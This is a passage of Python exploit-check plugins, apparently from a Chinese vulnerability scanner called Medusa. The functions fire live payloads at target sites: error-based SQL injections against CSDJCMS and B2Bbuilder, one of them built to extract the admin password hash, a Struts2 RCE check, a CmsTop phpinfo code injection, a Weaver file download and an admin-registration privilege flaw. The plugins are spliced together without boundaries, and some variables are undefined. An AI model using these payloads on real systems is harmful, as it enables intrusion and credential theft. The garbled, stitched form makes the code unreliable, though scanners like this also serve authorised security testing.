str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/5clib/Inuseraction.action?actionkind=reg"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find('isIdCards()') != -1 and con.find(
'addressprompt') != -1:
Medusa = "{}存在五车图书管理系统存在越权添加管理员漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload_url = scheme + "://" + url + ':' + str(port) + payload
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
resp = requests.get(payload_url,
headers=headers,
proxies=proxies,
timeout=5,
verify=False)
con = resp.text
code = resp.status_code
if code == 200:
m = re.search(r'No error in <b>([^<]+)</b>', con)
if m:
Medusa = "{}存在泛微任意文件下载漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
url, payload_url)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, ProxyIp):
scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/index.php/open/bang"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
data = "openid=x&denglu=login&username=a%27 and(select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1#&userpass=testvul"
s = requests.session()
resp = s.post(payload_url,
headers=headers,
data=data,
timeout=6,
verify=False)
con = resp.text
if con.find("for key 'group_key'") != -1:
Medusa = "{}存在CSDJCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
payload_url = scheme+"://"+url+':'+str(port)+'/user.action'
host=url+':'+str(port)
headers = {
'Host':host,
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'User-Agent': RandomAgent,
'Connection': 'close',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '571',
'DNT': '1',
'Referer':payload_url,
'Upgrade-Insecure-Requests': '1'
}
try:
resp = requests.post(payload_url, data=payload,headers=headers, proxies=proxies,timeout=5, verify=False)
con = resp.text
code = resp.status_code
if code==200 and con.lower().find('uid')!=-1 and con.lower().find('gid')!=-1 and con.lower().find('groups')!=-1:
Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n影响版本:2_0_0-2_2_3\r\nPayload:{}\r\nPost:{}\r\n".format(url, payload_url,payload)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
# 爆密码:
# payload = "/comment.php?ctype=2&conid=16873 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,unhex(Hex(cast(b2bbuilder_admin.password as char))),0x27,0x7e) from `b2bbuilder`.b2bbuilder_admin Order by user limit 1,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1"
# 爆账号:
payload = "/comment.php?ctype=2&conid=16873%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(md5(c),0x3A,password)%20from%20b2bbuilder_admin%20Order%20by%20user%20limit%200,1)%20)%20from%20`information_schema`.tables%20limit%200,1),floor(rand(0)*2))x%20from%20`information_schema`.tables%20group%20by%20x)a)%20and%201=1"
payload_url = scheme + "://" + url +":"+ str(port)+ payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
}
s = requests.session()
resp = s.get(payload_url,headers=headers, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1:
Medusa = "{}存在B2BbuilderSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
web=ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/index.php"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"X-Forwarded-For":
"1.1.1.1',(select 1 from (select count(*),concat((Select concat(md5(3.14))),floor(rand(0)*2))x from information_schema.tables group by x)a),1,1)#"
}
s = requests.session()
resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("4beed3b9c4a886067de0e3a094246f781") != -1:
Medusa = "{}存在B2BbuilderSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
url, payload_url, resp.text)
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
return (str(_t.info))
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,ProxyIp):
scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
payload = "/app/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}"
payloadurl = scheme + "://" + url + ":" + str(port) + payload
payload2 = "/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}"
domain_name = ".".join(url.split(".")[1:])
payloadurl2 = scheme + "://app" + domain_name + ":" + str(port) + payload2
Payloads = [payloadurl,payloadurl2]
Medusas = [] # 存放返回数据
for payload_url in Payloads:
try:
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find('PHP Version') != -1 and con.find('Configure Command') != -1 :
Medusa = "{}存在CmsTop远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
web=ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
